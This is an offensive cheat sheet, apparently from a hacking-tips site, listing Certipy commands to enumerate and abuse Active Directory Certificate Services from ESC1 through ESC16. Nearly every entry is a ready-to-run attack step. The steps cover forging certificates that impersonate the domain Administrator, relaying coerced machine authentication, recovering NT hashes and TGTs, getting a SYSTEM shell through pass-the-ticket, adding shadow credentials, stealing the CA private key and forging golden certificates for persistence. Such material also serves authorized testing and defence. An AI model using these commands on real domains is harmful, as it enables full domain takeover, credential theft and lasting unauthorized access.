
Certipy — AD CS Abuse (ESC1–ESC16)

Active Directory Certificate Services enumeration and abuse with Certipy v5 — ESC1 through ESC16, NTLM relay to AD CS (ESC8/ESC11), shadow credentials, and golden certificates.

Jun 2026, lazyhackers
Enumeration & Discovery (5)

certipy find -u user@corp.local -p Password123 -dc-ip 10.10.10.1
    Enumerate CAs, templates and ACLs — dumps JSON/TXT report
    tags: find, enum

certipy find -u user@corp.local -p Password123 -dc-ip 10.10.10.1 -vulnerable -stdout
    Show only vulnerable templates (ESC findings) on stdout
    tags: find, esc, vulnerable

certipy find -u user@corp.local -p Password123 -dc-ip 10.10.10.1 -vulnerable -enabled
    Only enabled AND vulnerable templates (the real attack surface)
    tags: find, enabled

certipy find -u user@corp.local -hashes :NTLMhash -dc-ip 10.10.10.1 -bloodhound
    Pass-the-hash enumeration + BloodHound output for graphing
    tags: find, bloodhound, pth

certipy find -u user@corp.local -p Password123 -dc-ip 10.10.10.1 -text -json
    Force both text and JSON output of the AD CS layout
    tags: find, output
ESC1 — SAN Impersonation (3)

certipy req -u user@corp.local -p Password123 -dc-ip 10.10.10.1 -target ca.corp.local -ca CORP-CA -template ESC1-Template -upn administrator@corp.local
    Request a cert for the template, supplying the Administrator UPN in the SAN
    tags: esc1, req, san

certipy req -u user@corp.local -p Password123 -ca CORP-CA -template ESC1 -upn administrator@corp.local -dns dc01.corp.local
    Add both UPN and DNS SAN (impersonate a machine/DC)
    tags: esc1, san, dns

certipy req -u user@corp.local -p Password123 -ca CORP-CA -template ESC1 -upn administrator@corp.local -sid S-1-5-21-XXXX-500
    Embed the target SID (required when StrongCertificateBindingEnforcement is on)
    tags: esc1, sid, strongmapping
ESC2 / ESC3 — Any-Purpose & Enrollment Agent (3)

certipy req -u user@corp.local -p Password123 -ca CORP-CA -template ESC2 -upn administrator@corp.local
    ESC2 — Any-Purpose EKU template: request, then authenticate as anyone
    tags: esc2, anypurpose

certipy req -u user@corp.local -p Password123 -ca CORP-CA -template ESC3-CRA
    ESC3 step 1 — obtain a Certificate Request Agent (enrollment agent) cert
    tags: esc3, enrollmentagent

certipy req -u user@corp.local -p Password123 -ca CORP-CA -template User -pfx agent.pfx -on-behalf-of "corp\administrator"
    ESC3 step 2 — use the agent cert to enroll on behalf of a target
    tags: esc3, onbehalfof
ESC4 — Template ACL Abuse (3)

certipy template -u user@corp.local -p Password123 -dc-ip 10.10.10.1 -template VulnTemplate -write-default-configuration -save-configuration old.json
    You have write rights on the template → overwrite it into an ESC1-able config (the original is saved to old.json)
    tags: esc4, acl, template

certipy req -u user@corp.local -p Password123 -ca CORP-CA -template VulnTemplate -upn administrator@corp.local
    Now exploit the reconfigured template exactly like ESC1
    tags: esc4, req

certipy template -u user@corp.local -p Password123 -dc-ip 10.10.10.1 -template VulnTemplate -write-configuration old.json
    Restore the template to its original configuration (clean up!)
    tags: esc4, restore, opsec
ESC6 / ESC9 / ESC10 — SAN & Mapping Flaws (4)

certipy req -u user@corp.local -p Password123 -ca CORP-CA -template User -upn administrator@corp.local
    ESC6 — CA has EDITF_ATTRIBUTESUBJECTALTNAME2 set: any template honours an attacker-supplied SAN
    tags: esc6, san, ca

certipy account update -u user@corp.local -p Password123 -dc-ip 10.10.10.1 -user victim -upn administrator
    ESC9/10 step 1 — set a controlled user's UPN to the target (needs GenericWrite on that user)
    tags: esc9, esc10, upn, account

certipy req -u victim@corp.local -p VictimPass -ca CORP-CA -template ESC9-NoSecExt
    ESC9/10 step 2 — request a cert as the victim (template lacks the SID security extension)
    tags: esc9, req

certipy account update -u user@corp.local -p Password123 -dc-ip 10.10.10.1 -user victim -upn victim@corp.local
    ESC9/10 step 3 — restore the original UPN, then authenticate with the cert
    tags: esc9, restore
ESC7 — CA ACL (ManageCA / ManageCertificates) (4)

certipy ca -u user@corp.local -p Password123 -ca CORP-CA -dc-ip 10.10.10.1 -add-officer user
    Grant yourself the "officer" (ManageCertificates) right on the CA
    tags: esc7, ca, officer

certipy ca -u user@corp.local -p Password123 -ca CORP-CA -enable-template SubCA
    Enable the SubCA template so it can be requested
    tags: esc7, ca, template

certipy ca -u user@corp.local -p Password123 -ca CORP-CA -issue-request 1337
    Approve a pending (failed) certificate request by its ID
    tags: esc7, issue

certipy req -u user@corp.local -p Password123 -ca CORP-CA -retrieve 1337
    Retrieve the now-issued certificate after manual approval
    tags: esc7, retrieve
ESC8 / ESC11 — NTLM Relay to AD CS (3)

certipy relay -target http://ca.corp.local -template DomainController
    ESC8 — relay coerced machine authentication to the AD CS HTTP web-enrollment endpoint
    tags: esc8, relay, http

certipy relay -target rpc://ca.corp.local -ca CORP-CA -template DomainController
    ESC11 — relay to the CA RPC enrollment interface (ICertPassage) when the CA does not require encrypted (packet-privacy) RPC
    tags: esc11, relay, rpc

coercer coerce -u user -p Password123 -d corp.local -l 10.10.14.1 -t 10.10.10.1
    Trigger machine authentication toward your relay listener (PetitPotam / PrinterBug / DFSCoerce)
    tags: coerce, petitpotam
ESC13 / ESC15 / ESC16 — Policy & CA-Wide Flaws (3)

certipy req -u user@corp.local -p Password123 -ca CORP-CA -template ESC13-Template
    ESC13 — template with an issuance policy linked to a privileged group (OID group link)
    tags: esc13, issuancepolicy

certipy req -u user@corp.local -p Password123 -ca CORP-CA -template WebServer -upn administrator@corp.local -application-policies "Client Authentication"
    ESC15 (EKUwu / CVE-2024-49019) — inject application policies into a schema v1 template
    tags: esc15, cve-2024-49019, ekuwu

certipy req -u user@corp.local -p Password123 -ca CORP-CA -template User -upn administrator@corp.local
    ESC16 — the CA has the SID security extension disabled (CA-wide): pair with a UPN swap as in ESC9
    tags: esc16, ca, san
Authenticate & UnPAC-the-Hash (4)

certipy auth -pfx administrator.pfx -dc-ip 10.10.10.1
    PKINIT with the cert → get a TGT (.ccache) AND the account's NT hash
    tags: auth, pkinit, tgt

certipy auth -pfx administrator.pfx -dc-ip 10.10.10.1 -username administrator -domain corp.local
    Disambiguate the identity when the cert has multiple SANs
    tags: auth, identity

certipy auth -pfx user.pfx -dc-ip 10.10.10.1 -ldap-shell
    Authenticate over LDAP (Schannel) and drop into an interactive LDAP shell
    tags: auth, ldap, schannel

export KRB5CCNAME=administrator.ccache && impacket-psexec -k -no-pass corp.local/administrator@dc01.corp.local
    Use the recovered TGT for a SYSTEM shell (pass-the-ticket)
    tags: auth, ptt, psexec
Shadow Credentials & Golden Certificate (4)

certipy shadow auto -u user@corp.local -p Password123 -dc-ip 10.10.10.1 -account victim$
    Shadow Credentials — add a Key Credential, authenticate, recover the NT hash, then clean up
    tags: shadowcreds, keycredential

certipy ca -u user@corp.local -p Password123 -ca CORP-CA -dc-ip 10.10.10.1 -backup
    Steal the CA private key + cert (requires CA-admin / DA) — the basis for a Golden Certificate
    tags: goldencert, ca, backup

certipy forge -ca-pfx CORP-CA.pfx -upn administrator@corp.local -subject "CN=Administrator,CN=Users,DC=corp,DC=local"
    GOLDEN CERTIFICATE — forge an authentication cert for any user with the stolen CA key (offline)
    tags: goldencert, forge, persistence

certipy cert -pfx administrator.pfx -nokey -out admin.crt && certipy cert -pfx administrator.pfx -nocert -out admin.key
    Split a .pfx into separate cert and key files (for use with other tools)
    tags: cert, pfx